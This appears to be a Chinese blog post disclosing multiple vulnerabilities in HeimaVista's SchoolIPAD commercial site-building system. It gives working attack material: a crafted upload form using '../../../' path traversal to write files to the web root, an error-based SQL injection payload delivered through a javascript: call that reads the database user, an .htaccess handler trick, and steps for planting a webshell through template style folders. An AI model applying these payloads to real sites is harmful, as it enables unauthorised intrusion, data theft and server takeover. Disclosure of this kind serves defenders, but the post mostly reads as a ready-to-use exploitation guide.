台湾某流行商业建站系统SchoolIPAD多个高危安全漏洞
- <form name="Form1" action="http://域名/admin/filemanage.php?Programid=filemt" enctype="multipart/form-data" method="post">
- <input type="text" name="Category" value="../../../" />
- <input type="file" name="UpPict" size="24" />
- <input type="submit" name="AddHp" value="上传" />
- <input type="hidden" name="BigClass" />
- <input type="hidden" name="Par" />
- <input type="radio" name="UnZip" value="1" id="confirmyes" checked>
- <input type="hidden" value="" name="Controlaction" value="Upload" />
- function downByPar(key) {
- fm_editor.sajaxSubmit('Op=downByPar&Par='+key,'','fm_editor.callBack');
- }
- javascript:downByPar("4 union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select user() from information_schema.tables limit 0,1),0x3a)a from information_schema.tables group by a)b");
- Options -ExecCGI
- AddHandler cgi-script .php
建站系统特征:
厂商:HeimaVista Inc 1,后台部分组件绕过漏洞 2,文檔系統任意目录上传漏洞 <option id="cat_4" selected value="../../../"> 将文件直接上传到网站根目录。 也可本地构造表单例如: 就可以得到如上图的示范。 3,上传组件过滤不严 4,打包组件注入漏洞 这里的key是文件夹的序号。虽然文件夹名称等可以自定义,但是php在99%的情况下无权限重命名文件夹,因此这里是创建一个以1,2,3,4。。为序号的文件夹,然后编入数据库,名称与序号在数据库中排列 这里操作数据库的地方过滤不严,因此产生多类注入,部分可读写文件并取得webshell。 测试方法可以在地址栏输入 就能得到数据库报错信息 6,getshell漏洞 或者建立一个style文件夹,在文件夹中放入一个style.css,然后在style文件夹新建images文件夹,images文件夹放入webshell,在模板处新建模板即可获得webshell |
还没有人抢沙发呢~